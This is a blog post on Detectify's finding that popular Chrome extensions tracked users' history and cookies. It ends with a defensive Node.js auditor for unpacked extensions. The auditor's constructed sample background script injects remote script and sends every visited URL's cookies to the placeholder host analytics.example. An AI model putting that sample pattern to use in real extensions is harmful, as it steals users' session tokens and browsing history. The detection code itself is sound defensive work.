So what's going on? Briefly: if you use Google Chrome as your main browser and extend it with some of its many available extensions, you may be subject to behavioral tracking.
The Detectify team, a Sweden-based security company, identified and documented questionable behavior in a number of well-known, top-ranked Google Chrome Web Store extensions: they track the user's browsing history, cookies, and other secret tokens tied to well-known service providers such as Facebook and Dropbox.
These extensions, including HooverZoom, Instant Translate, FB Color Changer, SuperBlock AdBlocker and others (note that seven of the 12 listed extensions had been disabled in the Web Store as of the researchers' latest update), have this tracking behavior enabled by default and perform it without the user's consent, which is considered questionable and illegal. In some cases the tracking is provided by an external library that the extension's original author bundled, so it may run without even the author's knowledge.
In addition, according to the researchers, the services that perform the tracking and behavioral analytics have an auto-update feature that is separate by design from the extension's own update process. These services can also run in a background process separate from the main extension process, which lets them keep pursuing their tracking objectives behind the scenes. In practice this means the tracking code can check for and fetch new versions of itself without the user ever updating the extension, so the analytics provider can push changes to its tracking behavior at any time.
This is not the first time we have talked about digital privacy, information security and tracking. The threat to our online privacy has reached critical levels: we release private information to third parties both intentionally and unintentionally, and the most worrying part is that some of it is taken from us in a legitimized and uncontrolled way.
What can we do?
The Detectify team recommended that users first uninstall all extensions from their browser. Then, before installing any extension, read its description thoroughly to see whether it mentions anything of the sort (gathering information, accessing your links, cookies, etc.). They also noted that some of these descriptions are phrased in a way that makes the real intent behind them hard to identify.
Moreover, a lot of responsibility now rests with the Google Chrome team, which should, as a start, restrict extensions' access to browser cookies and other sensitive user information.
If you still need to use an extension that is flagged for such behavior, the team recommends using it in Chrome's incognito mode. Extensions are disabled in incognito mode unless you explicitly allow them, and an incognito session does not carry your normal cookies or persist history, which limits what a tracker can collect.
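Reading the store description only goes so far. If you download an extension as an unpacked directory, you can check its manifest and background scripts directly for the two things described above: permissions that expose history and cookies, and tracking code that is fetched from a remote server at runtime (and can therefore change without the extension itself being updated). The following Node.js script is an added example, not Detectify's code and not taken from any of the listed extensions; the sample manifest and background script it audits are constructed to resemble the described pattern, the `analytics.example` host is a placeholder, and the severity ratings and regex heuristics are the author's own choices.

```javascript
"use strict";

// Static audit of an unpacked Chrome extension: flags permissions that expose
// browsing history and cookies, and background code that loads or evaluates
// script at runtime (the mechanism that lets a bundled tracking library update
// itself independently of the extension's own update cycle).

// Permissions that expose the data the post says was collected, or that let a
// background script watch every site the user visits.
const SENSITIVE_PERMISSIONS = {
  history: "can read the full browsing history",
  cookies: "can read cookies (including session tokens) for permitted hosts",
  tabs: "can see the URL and title of every open tab",
  webRequest: "can observe every request the browser makes",
};

// Host permissions that amount to access to every site.
function grantsAllHosts(p) {
  return p === "<all_urls>" || /^(\*|https?):\/\/\*\/\*$/.test(p);
}

// Source patterns worth flagging in a background script. Heuristics, not proof.
const SCRIPT_CHECKS = [
  { re: /\.src\s*=\s*['"`]https?:\/\//, severity: "high",
    message: "injects a <script> fetched from a remote origin at runtime" },
  { re: /\bimportScripts\s*\(\s*['"`]https?:\/\//, severity: "high",
    message: "imports worker code from a remote origin at runtime" },
  { re: /\b(eval|new\s+Function)\s*\(/, severity: "high",
    message: "evaluates dynamically built code" },
  { re: /\bchrome\.history\./, severity: "medium", message: "reads or watches browsing history" },
  { re: /\bchrome\.cookies\./, severity: "medium", message: "reads cookies" },
  { re: /\b(fetch|XMLHttpRequest|navigator\.sendBeacon)\b/, severity: "info",
    message: "sends network requests from the background page" },
];

function auditManifest(manifest) {
  const findings = [];
  const perms = [].concat(manifest.permissions || [], manifest.host_permissions || []);
  for (const p of perms) {
    if (SENSITIVE_PERMISSIONS[p]) {
      findings.push({ severity: "medium", where: "manifest.permissions",
        message: `"${p}": ${SENSITIVE_PERMISSIONS[p]}` });
    } else if (grantsAllHosts(p)) {
      findings.push({ severity: "medium", where: "manifest.permissions",
        message: `"${p}": host access to every site` });
    }
  }
  // Manifest V2 let an extension relax its CSP; 'unsafe-eval' or a remote https
  // origin in script-src is what makes runtime loading of remote code possible.
  const csp = manifest.content_security_policy;
  if (typeof csp === "string") {
    if (/'unsafe-eval'/.test(csp)) {
      findings.push({ severity: "high", where: "manifest.content_security_policy",
        message: "allows eval()" });
    }
    const remote = csp.match(/script-src[^;]*?(https:\/\/[^\s;']+)/);
    if (remote) {
      findings.push({ severity: "high", where: "manifest.content_security_policy",
        message: `script-src allows scripts from ${remote[1]}` });
    }
  }
  if (manifest.background && manifest.background.persistent === true) {
    findings.push({ severity: "info", where: "manifest.background",
      message: "persistent background page (runs for the whole browser session)" });
  }
  return findings;
}

function auditScript(name, source) {
  return SCRIPT_CHECKS.filter((c) => c.re.test(source))
    .map((c) => ({ severity: c.severity, where: name, message: c.message }));
}

const SEVERITY_ORDER = { high: 0, medium: 1, info: 2 };

// scripts: { "<file name>": "<source text>" }. Returns findings, most severe first.
function auditExtension(manifest, scripts) {
  let findings = auditManifest(manifest);
  for (const [name, source] of Object.entries(scripts)) {
    findings = findings.concat(auditScript(name, source));
  }
  return findings.sort((a, b) => SEVERITY_ORDER[a.severity] - SEVERITY_ORDER[b.severity]);
}

// Constructed sample resembling the described pattern; not a real extension.
const SAMPLE_MANIFEST = {
  manifest_version: 2,
  name: "Example Image Zoomer",
  version: "1.0",
  permissions: ["tabs", "history", "cookies", "storage", "<all_urls>"],
  background: { scripts: ["background.js"], persistent: true },
  content_security_policy:
    "script-src 'self' 'unsafe-eval' https://analytics.example; object-src 'self'",
};

const SAMPLE_BACKGROUND = [
  "// 'analytics' loader bundled from a third-party library",
  "var s = document.createElement('script');",
  "s.src = 'https://analytics.example/tracker.js?v=' + Date.now();",
  "document.head.appendChild(s);",
  "chrome.history.onVisited.addListener(function (item) {",
  "  chrome.cookies.getAll({ url: item.url }, function (cookies) {",
  "    fetch('https://analytics.example/collect', {",
  "      method: 'POST', body: JSON.stringify({ url: item.url, cookies: cookies }) });",
  "  });",
  "});",
].join("\n");

const SAMPLE_FINDINGS = auditExtension(SAMPLE_MANIFEST, { "background.js": SAMPLE_BACKGROUND });
for (const f of SAMPLE_FINDINGS) console.log(`[${f.severity}] ${f.where}: ${f.message}`);
```

To run it against a real extension, load the unpacked directory's `manifest.json` and the files listed under `background` (or `content_scripts`) and pass them to `auditExtension`. A "high" finding from the remote-script or CSP checks is the signal to look for: a bundled library that pulls its own code from a server can change what it collects after the extension has passed review. Minified or obfuscated bundles will defeat these simple regexes, so a clean result is not a guarantee.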
For more details, refer to the original blog post, “Chrome Extensions – AKA Total Absence of Privacy”.
Update 1: The Detectify team updated their findings: 8 of the 12 Chrome extensions have now been removed from the Web Store for breaking store policy, and the remaining extensions have removed the tracking scripts.